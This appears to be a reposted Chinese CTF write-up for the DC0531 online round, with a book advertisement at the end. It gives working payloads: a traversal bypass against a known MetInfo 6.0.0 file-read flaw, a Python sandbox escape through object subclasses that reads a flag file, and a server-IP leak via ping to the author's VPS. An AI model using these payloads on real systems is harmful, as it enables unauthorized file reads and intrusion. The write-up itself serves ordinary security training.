内容简介:先关注公众号然后发现是个游戏。 测试发现通过分析可知,将武器切换为flag即可
Web1
先关注公众号然后发现是个游戏。 测试发现 s:ip
这样会向我们的vps发送ping请求 通过ping请求得到服务器ip,扫描得知存在git泄露
通过分析可知,将武器切换为flag即可
然后一直s我们的vps
得到base64加密的flag.php文件 PD9WaHAKJGZsYWcgPSAiREMwNTMxe1dlY2hBdF9Jc19Tb19DMG9sfSI7Cg
解密即可
Web2
题目存在git泄露 http://badcode.cc/2018/05/26/Metinfo-6-0-0-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/
根据网上纰漏的文件读取,然后进行bypass得到flag /include/thumb.php?dir=.....///./http/.....///./.....///./.....///./.....///./flag
Web3
首先输入 ().__class__.__base__.__subclasses__()
不可用
0x1.__class__.__base__.__subclasses__()
发现可用
0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")
可以读到文件流
但是不能直接 read,通过 for 循环将文件内容读取出来,这里注意不允许有空格
[i.read()for(i)in[0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")]]
Web4
原题 https://github.com/wonderkun/CTF_web/tree/dcf36cb9ba9a580a4e8d92b43480b6575fed2c3a/web200-7
以上所述就是小编给大家介绍的《DC0531 CTF 线上赛》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
The Nature of Code
Daniel Shiffman / The Nature of Code / 2012-12-13 / GBP 19.95
How can we capture the unpredictable evolutionary and emergent properties of nature in software? How can understanding the mathematical principles behind our physical world help us to create digital w......一起来看看 《The Nature of Code》 这本书的介绍吧!